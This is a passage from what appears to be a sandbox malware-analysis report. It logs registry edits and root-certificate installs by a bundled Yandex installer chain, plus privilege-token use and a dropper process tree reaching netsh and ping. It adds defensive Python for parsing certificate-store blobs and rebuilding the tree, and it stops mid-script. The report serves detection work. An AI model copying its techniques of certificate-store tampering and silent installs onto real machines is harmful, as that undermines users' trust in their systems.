Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --image-search=\"%1\"" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexSVG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.css C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTXT.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\SystemFileAssociations\.webp\shell\image_search\Icon = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,0" C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser FB2 Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexPNG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser PNG Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\yabrowser\shell\open\ddeexec\ C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBP.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.epub\OpenWithProgids\YandexEPUB.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.jpg\OpenWithProgids\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCRX.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser CRX Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexJPEG.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe\" --single-argument %1" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBM.ZPRIUFGQ5KQOETUJVA6LWFNAFA\ = "Yandex Browser WEBM Document" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexWEBM.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexCSS.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexTIFF.ZPRIUFGQ5KQOETUJVA6LWFNAFA\shell\open C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\.mhtml\OpenWithProgids C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexFB2.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe,-122" C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000_CLASSES\YandexINFE.ZPRIUFGQ5KQOETUJVA6LWFNAFA\DefaultIcon C:\Users\Admin\AppData\Local\Temp\YB_19527.tmp\setup.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (value elided) C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
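The Blob hex in the AuthRoot rows above is not a bare certificate: it is the CryptoAPI property list that the certificate store serialises, a sequence of records each made of a property ID, a reserved word (always 1), a length and the data, all as little-endian 32-bit integers. In the blob written by yadl.exe the record with ID 0x20 holds the DER certificate (its subject strings "Comodo CA Limited" and "AAA Certificate Services" are readable as ASCII in the hex), the record with ID 0x03 holds the SHA-1 d1eb23a4...64d8e349, and that value is also the registry key name. The script below is an added example, not code from the sandbox or the sample: it parses that layout, pulls out the DER, and checks that SHA-1 of the DER agrees with both the 0x03 record and the key name, which is how you decide what an unknown Blob actually installed and whether it was written by the store or planted by hand. The property names are from wincrypt.h; the embedded input is a constructed blob with a 5-byte stand-in for the certificate so the script runs offline. To check the real entry, pass `bytes.fromhex(<Blob hex from the row above>)` to `parse_cert_blob` with key name D1EB23A46D17D68FD92564C2F1F1601764D8E349.

```python
"""Parse and verify a Windows certificate-store registry Blob (added example)."""
import hashlib
import struct
from typing import Dict, List, Optional, Tuple

# Property identifiers from wincrypt.h (CERT_*_PROP_ID) that occur in this report's blobs.
PROP_NAMES = {
    0x03: "CERT_SHA1_HASH_PROP_ID",
    0x04: "CERT_MD5_HASH_PROP_ID",
    0x09: "CERT_ENHKEY_USAGE_PROP_ID",
    0x0B: "CERT_FRIENDLY_NAME_PROP_ID",
    0x0F: "CERT_SIGNATURE_HASH_PROP_ID",
    0x14: "CERT_KEY_IDENTIFIER_PROP_ID",
    0x19: "CERT_SUBJECT_PUBLIC_KEY_MD5_HASH_PROP_ID",
    0x1D: "CERT_SUBJECT_NAME_MD5_HASH_PROP_ID",
    0x20: "CERT_CERT_PROP_ID",
    0x53: "CERT_ROOT_PROGRAM_CERT_POLICIES_PROP_ID",
}
HEADER = struct.Struct("<III")  # propid, reserved (always 1), data length


def parse_cert_blob(blob: bytes) -> Dict[int, bytes]:
    """Walk the property list and return {propid: data}; rejects truncated or malformed input."""
    props: Dict[int, bytes] = {}
    off = 0
    while off < len(blob):
        if off + HEADER.size > len(blob):
            raise ValueError(f"truncated property header at offset {off}")
        propid, reserved, length = HEADER.unpack_from(blob, off)
        off += HEADER.size
        if reserved != 1:
            raise ValueError(f"property 0x{propid:02x}: reserved field is {reserved}, expected 1")
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError(f"property 0x{propid:02x} claims {length} bytes, only {len(data)} remain")
        props[propid] = data
        off += length
    return props


def build_cert_blob(props: List[Tuple[int, bytes]]) -> bytes:
    """Inverse of parse_cert_blob; used here only to construct the sample input."""
    return b"".join(HEADER.pack(pid, 1, len(data)) + data for pid, data in props)


def thumbprint(props: Dict[int, bytes]) -> str:
    """SHA-1 of the DER certificate (property 0x20), upper-case hex like the registry key name."""
    der = props.get(0x20)
    if der is None:
        raise ValueError("blob has no CERT_CERT_PROP_ID (0x20) entry")
    return hashlib.sha1(der).hexdigest().upper()


def verify_thumbprint(props: Dict[int, bytes], key_name: Optional[str] = None) -> bool:
    """True only if SHA-1(DER) equals the stored 0x03 property and, when given, the key name.

    A mismatch means the blob was edited or hand-crafted rather than written by the store."""
    computed = thumbprint(props)
    stored = props.get(0x03)
    if stored is None or stored.hex().upper() != computed:
        return False
    return key_name is None or key_name.upper() == computed


def friendly_name(props: Dict[int, bytes]) -> Optional[str]:
    """Property 0x0B is a NUL-terminated UTF-16LE string (the report's blob decodes to C·O·M·O·D·O)."""
    raw = props.get(0x0B)
    return raw.decode("utf-16-le").rstrip("\x00") if raw else None


def describe(props: Dict[int, bytes]) -> List[str]:
    """One human-readable line per property, in blob order."""
    return [f"0x{pid:02x} {PROP_NAMES.get(pid, 'unknown')} ({len(data)} bytes)"
            for pid, data in props.items()]


# Constructed sample: the report's record layout, but with a 5-byte stand-in
# (DER SEQUENCE { INTEGER 1 }) in place of the real 1078-byte certificate.
FAKE_DER = bytes([0x30, 0x03, 0x02, 0x01, 0x01])
SAMPLE_BLOB = build_cert_blob([
    (0x0B, "C\u00b7O\u00b7M\u00b7O\u00b7D\u00b7O".encode("utf-16-le") + b"\x00\x00"),
    (0x03, hashlib.sha1(FAKE_DER).digest()),
    (0x20, FAKE_DER),
])

if __name__ == "__main__":
    p = parse_cert_blob(SAMPLE_BLOB)
    print("\n".join(describe(p)))
    print("friendly name:", friendly_name(p))
    print("thumbprint:", thumbprint(p), "verified:", verify_thumbprint(p))
```

On the real blob the parser should report the ten property IDs listed in PROP_NAMES, a 1078-byte 0x20 record, and a thumbprint equal to the key name; a blob whose 0x03 record or key name disagrees with the hash of its own DER is the thing to escalate, because CryptoAPI never writes one.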

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
(this row is repeated 64 times in the original report; the identical rows are collapsed here)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A (2 occurrences; the sandbox left privilege LUID 33 unresolved, it is SeIncreaseWorkingSetPrivilege)
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe N/A (2 occurrences)
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A (12 occurrences)
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A (11 occurrences)

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A (2 occurrences)
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A (33 occurrences)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe N/A (32 occurrences)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (4 writes)
PID 1756 wrote to memory of 1488 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe (3 writes)
PID 1488 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\WTLDR.exe (4 writes)
PID 1488 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B1014REI\vmware.exe C:\Users\Admin\AppData\Local\Temp\KLSetup.exe (7 writes)
PID 2156 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\WTLDR.exe C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe (4 writes)
PID 1108 wrote to memory of 1544 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe (4 writes)
PID 1568 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Local\Temp\KLSetup.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe (7 writes)
PID 2212 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\7F4987FB1A6E43d69E3E94B29EB75926\YandexPackSetup.exe (7 writes)
PID 2212 wrote to memory of 1768 N/A C:\Users\Admin\AppData\Local\Temp\yadl.exe C:\Users\Admin\AppData\Local\Temp\yadl.exe (7 writes)
PID 1108 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\netsh.exe (4 writes)
PID 1108 wrote to memory of 2340 N/A C:\Users\Admin\AppData\Local\Temp\chrome_protect.exe C:\Windows\SysWOW64\cmd.exe (4 writes)
PID 2340 wrote to memory of 2372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE (4 writes)
PID 2556 wrote to memory of 2336 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe (5 writes)
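The WriteProcessMemory rows above are a parent-to-child map rather than evidence of injection: a parent writing into a child it has just created is what CreateProcess itself does on this Windows 7 guest (the user-mode loader writes the process parameters into the new process), and every target here was created by the writer. Injection would show as writes into a process the writer did not spawn, and there are none. The chain that matters is iexplore.exe (1756) -> vmware.exe (1488) -> WTLDR.exe (2156) -> chrome_protect.exe (1108) -> netsh.exe / cmd.exe -> PING.EXE, beside the separate KLSetup.exe -> yadl.exe -> YandexPackSetup.exe branch. The following Python is an added example, not part of this report or of the sandbox's tooling: it rebuilds that tree from the rows (one constructed line per distinct parent/child pair, copied from the table) and returns the ancestry of any PID.

```python
"""Rebuild the process tree from the sandbox's WriteProcessMemory rows.

Added example; the input is constructed from the report's own rows, one line
per distinct parent/child pair, and the PID -> image mapping comes from the
Process and Target columns of those rows.
"""
import re

# Constructed input: the distinct rows of the WriteProcessMemory table above.
ROWS = r"""
PID 1756 wrote to memory of 2884 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
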